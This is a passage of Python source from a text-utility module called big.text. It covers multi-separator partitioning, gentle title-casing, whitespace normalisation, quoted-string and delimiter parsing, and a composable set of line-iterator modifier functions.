Example:\n\n multipartition('aXbYz', ('X', 'Y')) => ('a', 'X', 'bYz')\n\n If none of the separators are found in the string, returns\n a tuple containing `s` unchanged followed by two empty strings.\n\n multipartition is *greedy*: if two or more separators appear at\n the leftmost location in `s`, multipartition partitions using\n the longest matching separator. For example:\n\n big.multipartition('wxabcyz', ('a', 'abc')) => ('wx', 'abc', 'yz')\n\n Passing in an explicit \"count\" lets you control how many times\n multipartition partitions the string. multipartition will always\n return a tuple containing (2*count)+1 elements. Passing in a\n count of 0 will always return a tuple containing s.\n\n If `separate` is true, multiple adjacent separator strings behave\n like one separator. Example:\n\n big.text.multipartition('aXYbYXc', ('X', 'Y',), count=2, separate=False) => ('a', 'XY', 'b', 'YX', 'c')\n big.text.multipartition('aXYbYXc', ('X', 'Y',), count=2, separate=True ) => ('a', 'X', '', 'Y', 'bYXc')\n\n If reverse is true, multipartition behaves like str.rpartition.\n It partitions starting on the right, scanning backwards through\n s looking for separators.\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes). multipartition\n will only yield str or bytes objects.\n \"\"\"\n if count < 0:\n raise ValueError(\"count must be positive\")\n result = list(multisplit(s, separators,\n keep=ALTERNATING,\n reverse=reverse,\n separate=separate,\n strip=False,\n maxsplit=count))\n desired_length = (2 * count) + 1\n result_length = len(result)\n if result_length < desired_length:\n if isinstance(s, bytes):\n empty = (b'',)\n else:\n empty = ('',)\n extension = empty * (desired_length - result_length)\n if reverse:\n result = list(extension) + result\n else:\n result.extend(extension)\n return tuple(result)\n\n@_export\ndef multirpartition(s, separators, count=1, *, reverse=False, separate=True):\n return multipartition(s, separators, count=count, reverse=not reverse, separate=separate)\n\n\n# I declare that, for our purposes,\n# ` (the \"back-tick\" character U+0060)\n# is *not* an apostrophe. it's a diacritical\n# used to modify a letter, rather than a\n# separator used to separate letters.\n# It's been (ab)used as an apostrophe historically,\n# but that's because ASCII had a limited number of\n# punctuation characters.\napostrophes = unicode_apostrophes = \"'‘’‚‛\"\n_export_name('apostrophes')\ndouble_quotes = unicode_double_quotes = '\"“”„‟«»‹›'\n_export_name('double_quotes')\n\nascii_apostrophes = b\"'\"\n_export_name('ascii_apostrophes')\nascii_double_quotes = b'\"'\n_export_name('ascii_double_quotes')\n\nutf8_apostrophes = apostrophes.encode('utf-8')\n_export_name('utf8_apostrophes')\nutf8_double_quotes = double_quotes.encode('utf-8')\n_export_name('utf8_double_quotes')\n\n\n_invalid_state = \"_invalid_state\"\n_in_word = \"_in_word\"\n_after_whitespace = \"_after_whitespace\"\n_after_whitespace_then_apostrophe_or_double_quote = \"_after_whitespace_then_apostrophe_or_double_quote\"\n_after_whitespace_then_D_or_O = \"_after_whitespace_then_D_or_O\"\n_after_whitespace_then_D_or_O_then_apostrophe = \"_after_whitespace_then_D_or_O_then_apostrophe\"\n\n_default_str_is_apostrophe = frozenset(unicode_apostrophes).__contains__\n_default_str_is_double_quote = frozenset(unicode_double_quotes).__contains__\n_default_bytes_is_apostrophe = ascii_apostrophes.__eq__\n_default_bytes_is_double_quote = ascii_double_quotes.__eq__\n_str_do_contains = 'DO'.__contains__\n_bytes_do_contains = b'DO'.__contains__\n\n@_export\ndef gently_title(s, *, apostrophes=None, double_quotes=None):\n \"\"\"\n Uppercase the first character of every word in s,\n and leave all other characters alone.\n\n (For the purposes of this algorithm, words are\n any blob of non-whitespace characters.)\n\n Capitalize the letter after an apostrophe if\n a) the apostrophe is after whitespace or a\n left parenthesis character ('(')\n (or is the first letter of the string), or\n b) if the apostrophe is after a letter O or D,\n and that O or D is after whitespace (or is\n the first letter of the string). The O or D\n here will also be capitalized.\n Rule a) handles internally quoted strings:\n He Said 'No I Did Not'\n and contractions that start with an apostrophe\n 'Twas The Night Before Christmas\n Rule b) handles certain Irish, French, and Italian\n names.\n Peter O'Toole\n Lord D'Arcy\n\n Capitalize the letter after a quote mark if\n the quote mark is after whitespace (or is the\n first letter of a string).\n\n A run of consecutive apostrophes and/or\n quote marks is considered one quote mark for\n the purposes of capitalization.\n\n s should be a str or bytes object. s can also\n be an instance of a subclass of str or bytes,\n however, gently_title will only ever return a\n str or bytes object.\n\n If specified, apostrophes and double_quotes should\n an string, or iterable of strings, of the same type\n as s (or a conformant type).\n\n If apostrophes is false, gently_title will use a\n default value for apostrophes:\n If s is str, the default value is big.text.apostrophes,\n a string containing all Unicode code points that\n represent apostrophes.\n\n If s is bytes, the default value is\n big.text.ascii_apostrophes, which is the string b\"'\".\n\n If double_quotes is false, gently_title will use a\n default value for double_quotes:\n If s is str, the default value is big.text.double_quotes,\n a string containing all Unicode code points representing\n double-quote marks.\n\n If s is bytes, the default value is\n big.text.ascii_double_quotes, which is the string b\"'\".\n \"\"\"\n if isinstance(s, bytes):\n s_type = bytes\n empty = b\"\"\n _is_d_or_o = _bytes_do_contains\n lparen = b'('\n iterator = _iterate_over_bytes\n default_is_apostrophe = _default_bytes_is_apostrophe\n default_is_double_quote = _default_bytes_is_double_quote\n else:\n s_type = str\n empty = \"\"\n default_is_apostrophe = _default_str_is_apostrophe\n default_is_double_quote = _default_str_is_double_quote\n _is_d_or_o = _str_do_contains\n lparen = '('\n iterator = iter\n\n if apostrophes is None:\n _is_apostrophe = default_is_apostrophe\n else:\n cast_apostrophes = []\n for o in iterator(apostrophes):\n if not isinstance(o, s_type):\n raise TypeError(f\"apostrophes must be an iterable of non-empty objects the same type as s, or None\")\n if not o:\n raise ValueError(\"apostrophes must be an iterable of non-empty objects the same type as s, or None\")\n cast_apostrophes.append(o)\n if not apostrophes:\n raise ValueError(\"apostrophes must be an iterable of non-empty objects the same type as s\")\n _is_apostrophe = frozenset(cast_apostrophes).__contains__\n\n if double_quotes is None:\n _is_double_quote = default_is_double_quote\n else:\n cast_double_quotes = []\n for o in iterator(double_quotes):\n if not isinstance(o, s_type):\n raise TypeError(\"double_quotes must be an iterable of non-empty objects the same type as s, or None\")\n if not o:\n raise ValueError(\"double_quotes must be an iterable of non-empty objects the same type as s, or None\")\n cast_double_quotes.append(o)\n if not double_quotes:\n raise ValueError(\"double_quotes must be an iterable of non-empty objects the same type as s\")\n _is_double_quote = frozenset(cast_double_quotes).__contains__\n\n result = []\n state = _after_whitespace\n for c in iterator(s):\n original_c = c\n original_state = state\n is_space = c.isspace() or (c == lparen)\n is_apostrophe = _is_apostrophe(c)\n is_double_quote = _is_double_quote(c)\n if state == _in_word:\n if is_space:\n state = _after_whitespace\n elif state == _after_whitespace:\n if not is_space:\n c = c.upper()\n if (is_apostrophe or is_double_quote):\n state = _after_whitespace_then_apostrophe_or_double_quote\n elif _is_d_or_o(c):\n state = _after_whitespace_then_D_or_O\n else:\n state = _in_word\n elif state == _after_whitespace_then_apostrophe_or_double_quote:\n if not (is_apostrophe or is_double_quote):\n c = c.upper()\n state = _in_word\n elif state == _after_whitespace_then_D_or_O:\n if is_apostrophe:\n state = _after_whitespace_then_D_or_O_then_apostrophe\n else:\n state = _in_word\n elif state == _after_whitespace_then_D_or_O_then_apostrophe:\n c = c.upper()\n state = _in_word\n result.append(c)\n return empty.join(result)\n\n@_export\ndef normalize_whitespace(s, separators=None, replacement=None):\n \"\"\"\n Returns s, but with every run of consecutive\n separator characters turned into a replacement string.\n By default turns all runs of consecutive whitespace\n characters into a single space character.\n\n s may be str or bytes.\n separators should be an iterable of either str or bytes objects,\n matching s.\n replacement should be either a str or bytes object,\n also matching s, or None (the default).\n If replacement is None, normalize_whitespace will use\n a replacement string consisting of a single space character.\n\n Leading or trailing runs of separator characters will\n be replaced with the replacement string, e.g.:\n\n normalize_whitespace(\" a b c\") == \" a b c\".\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes).\n normalize_whitespace will only return str or bytes objects.\n \"\"\"\n\n if isinstance(s, bytes):\n empty = b''\n default_replacement = b' '\n default_separators = bytes_whitespace_without_crlf\n s_type = bytes\n else:\n empty = ''\n default_replacement = ' '\n default_separators = whitespace_without_crlf\n s_type = str\n\n if separators is None:\n separators = default_separators\n elif isinstance(separators, s_type):\n if s_type == bytes:\n # not iterable of bytes, literally a bytes string.\n # split it ourselves. otherwise, _separators_to_re will\n # iterate over it, which... yields integers! oops!\n separators = _iterate_over_bytes(separators)\n separators = tuple(separators)\n else:\n cast_separators = []\n for o in separators:\n if not isinstance(o, s_type):\n raise TypeError(\"separators must be an iterable of non-empty objects the same type as s, or None\")\n if not o:\n raise ValueError(\"separators must be an iterable of non-empty objects the same type as s, or None\")\n cast_separators.append(o)\n if not cast_separators:\n raise ValueError(\"separators must be an iterable of non-empty objects the same type as s, or None\")\n separators = tuple(cast_separators)\n\n if replacement is None:\n replacement = default_replacement\n elif not isinstance(replacement, s_type):\n raise TypeError(\"replacement must be the same type as s, or None\")\n\n if not s:\n return empty\n\n # normalize_whitespace has a fast path for\n # normalizing whitespace on str objects.\n # if your \"separators\" qualifies,\n # it'll automatically use the fast path.\n #\n # we can't use the fast path for bytes objects,\n # because it won't work with encoded whitespace\n # characters > chr(127).\n #\n # (it'd *usually* work, sure.\n # but \"usually\" isn't good enough for big!)\n if ( (separators is whitespace_without_crlf)\n or (separators is whitespace)\n ):\n if not s.strip():\n return replacement\n words = s.split()\n if s[:1].isspace():\n words.insert(0, empty)\n if s[-1:].isspace():\n words.append(empty)\n cleaned = replacement.join(words)\n return cleaned\n\n words = list(multisplit(s, separators, keep=False, separate=False, strip=False, reverse=False, maxsplit=-1))\n cleaned = replacement.join(words)\n del words\n return cleaned\n\n\n@_export\ndef split_quoted_strings(s, quotes=None, *, triple_quotes=True, backslash=None):\n \"\"\"\n Splits s into quoted and unquoted segments.\n\n s can be either str or bytes.\n\n quotes is an iterable of quote separators, either str or bytes matching s.\n Note that split_quoted_strings only supports quote *characters*, as in,\n each quote separator must be exactly one character long.\n\n Returns an iterator yielding 2-tuples:\n (is_quoted, segment)\n where segment is a substring of s, and is_quoted is true if the segment is\n quoted. Joining all the segments together recreates s.\n\n If triple_quotes is true, supports \"triple-quoted\" strings like Python.\n\n If backslash is a character, this character will quoting characters inside\n a quoted string, like the backslash character inside strings in Python.\n\n You can pass in an instance of a subclass of bytes or str\n for s and quotes, but the base class for both must be\n the same (str or bytes). split_quoted_strings will only\n return str or bytes objects.\n \"\"\"\n if isinstance(s, bytes):\n empty = b''\n if quotes is None:\n quotes=(b'\"', b\"'\")\n if backslash is None:\n backslash = b'\\\\'\n i = _iterate_over_bytes(s)\n else:\n empty = ''\n if quotes is None:\n quotes=('\"', \"'\")\n if backslash is None:\n backslash = '\\\\'\n i = s\n empty_join = empty.join\n\n i = PushbackIterator(i)\n in_quote = None\n in_triple_quote = False\n in_backslash = False\n text = []\n for c in i:\n if not in_quote:\n # encountered character while not in quoted string.\n if c not in quotes:\n # general case. append unquoted character to our unquoted string.\n text.append(c)\n continue\n if not triple_quotes:\n # triple quotes are off, encountered quote.\n # flush unquoted string, start quoted string.\n if text:\n yield False, empty_join(text)\n text.clear()\n text.append(c)\n in_quote = c\n continue\n # scan for triple quotes.\n c2 = next(i)\n if c2 != c:\n # only a single quote mark. flush unquoted string, start quoted string.\n i.push(c2)\n if text:\n yield False, empty_join(text)\n text.clear()\n text.append(c)\n in_quote = c\n continue\n c3 = i.next(None)\n if c3 != c:\n # two quotes in a row, but not three.\n # flush unquoted string, emit empty quoted string.\n if text:\n yield False, empty_join(text)\n text.clear()\n yield True, c*2\n if c3 is not None:\n i.push(c3)\n continue\n # triple quoted string.\n # flush unquoted string, start triple quoted string.\n if text:\n yield False, empty_join(text)\n text.clear()\n text.append(c*3)\n in_quote = c\n in_triple_quote = c\n continue\n\n # handle quoted string\n if in_backslash:\n # previous character was a backslash.\n # append this character no matter what it is.\n text.append(c)\n in_backslash = False\n continue\n if c == backslash:\n # encountered backslash character.\n # set flag so we append the next character,\n # no matter what it is.\n in_backslash = True\n text.append(c)\n continue\n if c != in_quote:\n # character doesn't match our quote marker.\n # append to our quoted string.\n text.append(c)\n continue\n if not in_triple_quote:\n # we found our quote mark, and we're only\n # in single quotes (not triple quotes).\n # finish and emit the quoted string,\n # and return to unquoted mode.\n text.append(c)\n yield True, empty_join(text)\n text.clear()\n in_quote = False\n continue\n # we're in a triple-quoted string,\n # and found one of our quote marks.\n # scan to see if we got three in a row.\n c2 = i.next(None)\n c3 = i.next(None)\n if c == c2 == c3:\n # we found triple quotes.\n # finish and emit the triple-quoted string,\n # and return to unquoted mode.\n text.append(c*3)\n yield True, empty_join(text)\n text.clear()\n in_triple_quote = in_quote = False\n continue\n # didn't find triple quotes. append the single\n # quote mark to our quoted string and push the\n # other two characters back onto the iterator.\n text.append(c)\n if c2 is not None:\n if c3 is not None:\n i.push(c3)\n i.push(c2)\n\n # flush the remainder of the string we were building,\n # in whatever condition it's in.\n if text:\n yield in_quote, empty_join(text)\n\n\n@_export\nclass Delimiter:\n \"\"\"\n Class representing a delimiter for parse_delimiters.\n\n open is the opening delimiter character, can be str or bytes, must be length 1.\n close is the closing delimiter character, must be the same type as open, and length 1.\n backslash is a boolean: when inside this delimiter, can you escape delimiters\n with a backslash? (You usually can inside single or double quotes.)\n nested is a boolean: must other delimiters nest in this delimiter?\n (Delimiters don't usually need to be nested inside single and double quotes.)\n \"\"\"\n def __init__(self, open, close, *, backslash=False, nested=True):\n if isinstance(open, bytes):\n t = bytes\n else:\n t = str\n if not (isinstance(open, t) and isinstance(close, t)):\n raise TypeError(f\"open={open!r} and close={close!r}, they must be the same type, either str or bytes\")\n\n self.open = open\n self.close = close\n self.backslash = backslash\n self.nested = nested\n\n def __repr__(self): # pragma: no cover\n return f\"Delimiter(open={self.open!r}, close={self.close!r}, backslash={self.backslash}, nested={self.nested})\"\n\ndelimiter_parentheses = \"()\"\n_export_name('delimiter_parentheses')\n\ndelimiter_square_brackets = \"[]\"\n_export_name('delimiter_square_brackets')\n\ndelimiter_curly_braces = \"{}\"\n_export_name('delimiter_curly_braces')\n\ndelimiter_angle_brackets = \"<>\"\n_export_name('delimiter_angle_brackets')\n\ndelimiter_single_quote = Delimiter(\"'\", \"'\", backslash=True, nested=False)\n_export_name('delimiter_single_quote')\n\ndelimiter_double_quotes = Delimiter('\"', '\"', backslash=True, nested=False)\n_export_name('delimiter_double_quotes')\n\nparse_delimiters_default_delimiters = (\n delimiter_parentheses,\n delimiter_square_brackets,\n delimiter_curly_braces,\n delimiter_single_quote,\n delimiter_double_quotes,\n )\n_export_name('parse_delimiters_default_delimiters')\n\nparse_delimiters_default_delimiters_bytes = (\n b'()',\n b'[]',\n b'{}',\n Delimiter(b\"'\", b\"'\", backslash=True, nested=False),\n Delimiter(b'\"', b'\"', backslash=True, nested=False),\n )\n_export_name('parse_delimiters_default_delimiters_bytes')\n\n\n# break the rules\n_base_delimiter = Delimiter('a', 'b')\n_base_delimiter.open = _base_delimiter.close = None\n\n@_export\ndef parse_delimiters(s, delimiters=None):\n \"\"\"\n Parses a string containing nesting delimiters.\n Raises an exception if mismatched delimiters are detected.\n\n s may be str or bytes.\n\n delimiters may be either None or an iterable containing\n either Delimiter objects or objects matching s (str or bytes).\n Entries in the delimiters iterable which are str or bytes\n should be exactly two characters long; these will be used\n as the open and close arguments for a new Delimiter object.\n\n If delimiters is None, parse_delimiters uses a default\n value matching these pairs of delimiters:\n () [] {} \"\" ''\n The quote mark delimiters enable backslash quoting and disable nesting.\n\n Yields 3-tuples containing strings:\n (text, open, close)\n where text is the text before the next opening or closing delimiter,\n open is the trailing opening delimiter,\n and close is the trailing closing delimiter.\n At least one of these three strings will always be non-empty.\n If open is non-empty, close will be empty, and vice-versa.\n If s does not end with a closing delimiter, in the final tuple\n yielded, both open and close will be empty strings.\n\n You can only specify a particular character as an opening delimiter\n once, though you may reuse a particular character as a closing\n delimiter multiple times.\n \"\"\"\n if isinstance(s, bytes):\n s_type = bytes\n if delimiters is None:\n delimiters = parse_delimiters_default_delimiters_bytes\n backslash_character = b'\\\\'\n disallowed_delimiters = backslash_character\n empty = b''\n else:\n s_type = str\n if delimiters is None:\n delimiters = parse_delimiters_default_delimiters\n backslash_character = '\\\\'\n disallowed_delimiters = backslash_character\n empty = ''\n\n if not delimiters:\n raise ValueError(\"invalid delimiters\")\n # convert\n delimiters2 = []\n for d in delimiters:\n if isinstance(d, Delimiter):\n delimiters2.append(d)\n continue\n if isinstance(d, s_type):\n if not len(d) == 2:\n raise ValueError(f\"illegal delimiter string {d!r}, must be 2 characters long\")\n delimiters2.append(Delimiter(d[0:1], d[1:2]))\n continue\n raise TypeError(f\"invalid delimiter {d!r}\")\n\n delimiters = delimiters2\n # early-detect errors\n\n # scan for disallowed\n delimiter_characters = {d.open for d in delimiters} | {d.close for d in delimiters}\n disallowed = {disallowed_delimiters}\n illegal_delimiters = disallowed & delimiter_characters\n if illegal_delimiters:\n raise ValueError(\"illegal delimiters used: \" + \"\".join(illegal_delimiters))\n\n # closers is a set of closing delimiters *only*.\n # if open and close delimiters are the same (e.g. quote marks)\n # it shouldn't go in closers.\n seen = set()\n repeated = []\n closers = set()\n for d in delimiters:\n if d.open in seen:\n repeated.append(d.open)\n seen.add(d.open)\n if d.close != d.open:\n closers.add(d.close)\n\n if repeated:\n raise ValueError(\"these opening delimiters were used multiple times: \" + \" \".join(repeated))\n\n def parse_delimiters(s, delimiters):\n open_to_delimiter = {d.open: d for d in delimiters}\n\n text = []\n append = text.append\n def flush(open, close):\n s = empty.join(text)\n text.clear()\n assert s or open or close\n return s, open, close\n\n # d stores the *current* delimiter\n # d is not in stack.\n d = _base_delimiter\n stack = []\n backslash = d.backslash\n nested = d.nested\n close = None\n quoted = False\n\n for i, c in enumerate(_iterate_over_bytes(s)):\n if quoted:\n append(c)\n quoted = False\n continue\n if c == close:\n yield flush(empty, c)\n d = stack.pop()\n backslash = d.backslash\n nested = d.nested\n close = d.close\n continue\n if nested:\n if c in closers:\n # this is a closing delimiter,\n # but it doesn't match.\n # (if it did, we'd have handled it\n # in \"if c == close\" above.)\n raise ValueError(f\"mismatched closing delimiter at s[{i}]: expected {close}, got {c}\")\n next_d = open_to_delimiter.get(c)\n if next_d:\n yield flush(c, empty)\n stack.append(d)\n d = next_d\n backslash = d.backslash\n nested = d.nested\n close = d.close\n continue\n if backslash and (c == backslash_character):\n quoted = True\n append(c)\n\n if len(stack):\n stack.pop(0)\n stack.append(d)\n raise ValueError(\"s does not close all opened delimiters, needs \" + \" \".join(d.close for d in reversed(stack)))\n\n if text:\n yield flush(empty, empty)\n\n return parse_delimiters(s, delimiters)\n\n\n\n@_export\nclass LineInfo:\n \"\"\"\n The second object yielded by a lines iterator,\n containing metadata about the line.\n You can add your own fields by passing them in\n via **kwargs; you can also add new attributes\n or modify existing attributes as needed from\n inside a \"lines modifier\" function.\n \"\"\"\n def __init__(self, line, line_number, column_number, **kwargs):\n if not isinstance(line, (str, bytes)):\n raise TypeError(\"line must be str or bytes\")\n if not isinstance(line_number, int):\n raise TypeError(\"line_number must be int\")\n if not isinstance(column_number, int):\n raise TypeError(\"column_number must be int\")\n self.line = line\n self.line_number = line_number\n self.column_number = column_number\n self.__dict__.update(kwargs)\n\n def __repr__(self):\n names = list(self.__dict__)\n priority_names = ['line', 'line_number', 'column_number']\n fields = []\n for name in priority_names:\n names.remove(name)\n names.sort()\n names = priority_names + names\n for name in names:\n fields.append(f\"{name}={getattr(self, name)!r}\")\n text = \", \".join(fields)\n return f\"LineInfo({text})\"\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and (other.__dict__ == self.__dict__)\n\n\n@_export\nclass lines:\n def __init__(self, s, separators=None, *, line_number=1, column_number=1, tab_width=8, **kwargs):\n \"\"\"\n A \"lines iterator\" object. Splits s into lines, and iterates yielding those lines.\n\n \"s\" can be str, bytes, or any iterable of str or bytes.\n\n If s is neither str nor bytes, s must be an iterable;\n lines yields successive elements of s as lines. All objects\n yielded by this iterable should be homogeneous, either str or bytes.\n\n If s is str or bytes, and separators is None, lines\n will split s at line boundaries and yield those lines,\n including empty lines. If separators is not None,\n it must be an iterable of strings of the same type as s;\n lines will split s using multisplit.\n\n When iterated over, yields 2-tuples:\n (info, line)\n\n info is a LineInfo object, which contains three fields by default:\n * line - the original line, never modified\n * line_number - the line number of this line, starting at the\n line_number passed in and adding 1 for each successive line\n * column_number - the column this line starts on,\n starting at the column_number passed in, and adjusted when\n characters are removed from the beginning of line\n\n tab_width is not used by lines itself, but is stored internally and\n may be used by other lines modifier functions\n (e.g. lines_convert_tabs_to_spaces, lines_strip_indent). Similarly,\n all keyword arguments passed in via kwargs are stored internally\n and can be accessed by user-defined lines modifier functions.\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes). lines will\n only yield str or bytes objects.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if not isinstance(line_number, int):\n raise TypeError(\"line_number must be int\")\n if not isinstance(column_number, int):\n raise TypeError(\"column_number must be int\")\n if not isinstance(tab_width, int):\n raise TypeError(\"tab_width must be int\")\n\n is_bytes = isinstance(s, bytes)\n is_str = isinstance(s, str)\n if is_bytes or is_str:\n if not separators:\n separators = linebreaks if is_str else bytes_linebreaks\n i = multisplit(s, separators, keep=False, separate=True, strip=False)\n else:\n i = iter(s)\n is_bytes = None\n\n self.s = s\n self.separators = separators\n self.line_number = line_number\n self.column_number = column_number\n self.tab_width = tab_width\n self.s_is_bytes = is_bytes\n\n self.i = i\n\n self.__dict__.update(kwargs)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n line = next(self.i)\n if self.s_is_bytes is None:\n self.s_is_bytes = isinstance(line, bytes)\n return_value = (LineInfo(line, self.line_number, self.column_number), line)\n self.line_number += 1\n return return_value\n\n@_export\ndef lines_rstrip(li):\n \"\"\"\n A lines modifier function. Strips trailing whitespace from the\n lines of a \"lines iterator\".\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n for info, line in li:\n yield (info, line.rstrip())\n\n@_export\ndef lines_strip(li):\n \"\"\"\n A lines modifier function. Strips leading and trailing whitespace\n from the lines of a \"lines iterator\".\n\n If lines_strip removes leading whitespace from a line, it adds\n a field to the associated LineInfo object:\n * leading - the leading whitespace string that was removed\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n for info, line in li:\n lstripped = line.lstrip()\n if not lstripped:\n line = lstripped\n else:\n original_leading = line[:len(line) - len(lstripped)]\n if original_leading:\n leading = original_leading.expandtabs(li.tab_width)\n info.column_number += len(leading)\n line = lstripped.rstrip()\n info.leading = original_leading\n\n yield (info, line)\n\n@_export\ndef lines_filter_comment_lines(li, comment_separators):\n \"\"\"\n A lines modifier function. Filters out comment lines from the\n lines of a \"lines iterator\". Comment lines are lines whose first\n non-whitespace characters appear in the iterable of\n comment_separators strings passed in.\n\n What's the difference between lines_strip_comments and\n lines_filter_comment_lines?\n * lines_filter_comment_lines only recognizes lines that\n *start* with a comment separator (ignoring leading\n whitespace). Also, it filters out those lines\n completely, rather than modifying the line.\n * lines_strip_comments handles comment characters\n anywhere in the line, although it can ignore\n comments inside quoted strings. It truncates the\n line but still always yields the line.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if not comment_separators:\n raise ValueError(\"illegal comment_separators\")\n\n if isinstance(comment_separators, bytes):\n comment_separators = _iterate_over_bytes(comment_separators)\n comment_separators_is_bytes = True\n else:\n comment_separators_is_bytes = isinstance(comment_separators[0], bytes)\n comment_separators = tuple(comment_separators)\n\n comment_pattern = _separators_to_re(comment_separators, comment_separators_is_bytes, separate=False, keep=False)\n comment_re = re.compile(comment_pattern)\n\n def lines_filter_comment_lines(li, comment_re):\n for info, line in li:\n s = line.lstrip()\n if comment_re.match(s):\n continue\n yield (info, line)\n return lines_filter_comment_lines(li, comment_re)\n\n\n@_export\ndef lines_containing(li, s, *, invert=False):\n \"\"\"\n A lines modifier function. Only yields lines\n that contain s. (Filters out lines that\n don't contain s.)\n\n If invert is true, returns the opposite--\n filters out lines that contain s.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if invert:\n for t in li:\n if not s in t[1]:\n yield t\n return\n for t in li:\n if s in t[1]:\n yield t\n\n@_export\ndef lines_grep(li, pattern, *, invert=False, flags=0):\n \"\"\"\n A lines modifier function. Only yields lines\n that match the regular expression pattern.\n (Filters out lines that don't match pattern.)\n\n pattern can be str, bytes, or an re.Pattern object.\n If pattern is not an re.Pattern object, it's compiled\n with re.compile(pattern, flags=flags).\n\n If invert is true, returns the opposite--\n filters out lines that match pattern.\n\n Composable with all the lines_ functions from the big.text module.\n\n (In older versions of Python, re.Pattern was a private type called\n re._pattern_type.)\n \"\"\"\n if not isinstance_re_pattern(pattern):\n pattern = re.compile(pattern, flags=flags)\n search = pattern.search\n\n if invert:\n def lines_grep(li, search):\n for t in li:\n if not search(t[1]):\n yield t\n return\n return lines_grep(li, search)\n\n def lines_grep(li, search):\n for t in li:\n if search(t[1]):\n yield t\n return lines_grep(li, search)\n\n@_export\ndef lines_sort(li, *, reverse=False):\n \"\"\"\n A lines modifier function. Sorts all\n input lines before yielding them.\n\n Lines are sorted lexicographically,\n from lowest to highest.\n If reverse is true, lines are sorted\n from highest to lowest.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n lines = list(li)\n lines.sort(key=lambda t:t[1], reverse=reverse)\n yield from iter(lines)\n\n@_export\ndef lines_strip_comments(li, comment_separators, *, quotes=('\"', \"'\"), backslash='\\\\', rstrip=True, triple_quotes=True):\n \"\"\"\n A lines modifier function. Strips comments from the lines\n of a \"lines iterator\". Comments are substrings that indicate\n the rest of the line should be ignored; lines_strip_comments\n truncates the line at the beginning of the leftmost comment\n separator.\n\n If rstrip is true (the default), lines_strip_comments calls\n the rstrip() method on line after it truncates the line.\n\n If quotes is true, it must be an iterable of quote characters.\n (Each quote character MUST be a single character.)\n lines_strip_comments will parse the line and ignore comment\n characters inside quoted strings. If quotes is false,\n quote characters are ignored and line_strip_comments will\n truncate anywhere in the line.\n\n backslash and triple_quotes are passed in to\n split_quoted_string, which is used internally to detect\n the quoted strings in the line.\n\n Sets a new field on the associated LineInfo object for every line:\n * comment - the comment stripped from the line, if any.\n if no comment was found, \"comment\" will be an empty string.\n\n What's the difference between lines_strip_comments and\n lines_filter_comment_lines?\n * lines_filter_comment_lines only recognizes lines that\n *start* with a comment separator (ignoring leading\n whitespace). Also, it filters out those lines\n completely, rather than modifying the line.\n * lines_strip_comments handles comment characters\n anywhere in the line, although it can ignore\n comments inside quoted strings. It truncates the\n line but still always yields the line.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n if not comment_separators:\n raise ValueError(\"illegal comment_separators\")\n\n if isinstance(comment_separators, bytes):\n comment_separators = _iterate_over_bytes(comment_separators)\n comment_separators_is_bytes = True\n else:\n comment_separators_is_bytes = isinstance(comment_separators[0], bytes)\n comment_separators = tuple(comment_separators)\n\n if comment_separators_is_bytes:\n empty = b''\n else:\n empty = ''\n empty_join = empty.join\n\n comment_pattern = __separators_to_re(comment_separators, separators_is_bytes=comment_separators_is_bytes, separate=True, keep=True)\n re_comment = re.compile(comment_pattern)\n split = re_comment.split\n\n\n def lines_strip_comments(li, split, quotes, backslash, rstrip, triple_quotes):\n for info, line in li:\n if quotes:\n i = split_quoted_strings(line, quotes, backslash=backslash, triple_quotes=triple_quotes)\n else:\n i = ((False, line),)\n segments = []\n append = segments.append\n comment = []\n for is_quoted, segment in i:\n if comment:\n comment.append(segment)\n continue\n if is_quoted:\n append(segment)\n continue\n fields = split(segment, maxsplit=1)\n leading = fields[0]\n if len(fields) == 1:\n append(leading)\n continue\n # found a comment marker in an unquoted segment!\n if rstrip:\n leading = leading.rstrip()\n append(leading)\n comment = fields[1:]\n\n info.comment = empty_join(comment)\n line = empty_join(segments)\n yield (info, line)\n return lines_strip_comments(li, split, quotes, backslash, rstrip, triple_quotes)\n\n@_export\ndef lines_convert_tabs_to_spaces(li):\n \"\"\"\n A lines modifier function. Converts tabs to spaces for the lines\n of a \"lines iterator\", using the tab_width passed in to lines.\n\n Composable with all the lines_ modifier functions in the big.text module.\n \"\"\"\n for info, line in li:\n yield (info, line.expandtabs(li.tab_width))\n\n\n@_export\ndef lines_strip_indent(li):\n \"\"\"\n A lines modifier function. Automatically measures and strips indents.\n\n Sets two new fields on the associated LineInfo object for every line:\n * indent - an integer indicating how many indents it's observed\n * leading - the leading whitespace string that was removed\n Also updates LineInfo.column_number as needed.\n\n Uses an intentionally simple algorithm.\n Only understands tab and space characters as indent characters.\n Internally detabs to spaces first for consistency, using the\n tab_width passed in to lines.\n\n You can only dedent out to a previous indent.\n Raises IndentationError if there's an illegal dedent.\n\n Composable with all the lines_ functions from the big.text module.\n \"\"\"\n indent = 0\n leadings = []\n for info, line in li:\n lstripped = line.lstrip()\n original_leading = line[:len(line) - len(lstripped)]\n leading = original_leading.expandtabs(li.tab_width)\n len_leading = len(leading)\n # print(f\"{leadings=} {line=} {leading=} {len_leading=}\")\n if leading.rstrip(' '):\n raise ValueError(f\"lines_strip_indent can't handle leading whitespace character {leading[0]!r}\")\n if not leading:\n indent = 0\n leadings.clear()\n new_indent = False\n elif not leadings:\n new_indent = True\n elif leadings[-1] == len_leading:\n new_indent = False\n elif len_leading > leadings[-1]:\n new_indent = True\n else:\n # not equal, not greater than... must be less than!\n new_indent = False\n assert leadings\n leadings.pop()\n indent -= 1\n while leadings:\n if leadings[-1] == len_leading:\n break\n if leadings[-1] > len_leading:\n new_indent = None\n break\n leadings.pop()\n indent -= 1\n if not leadings:\n new_indent = None\n\n # print(f\" >> {leadings=} {new_indent=}\")\n if new_indent:\n leadings.append(len_leading)\n indent += 1\n elif new_indent is None:\n raise IndentationError(f\"line 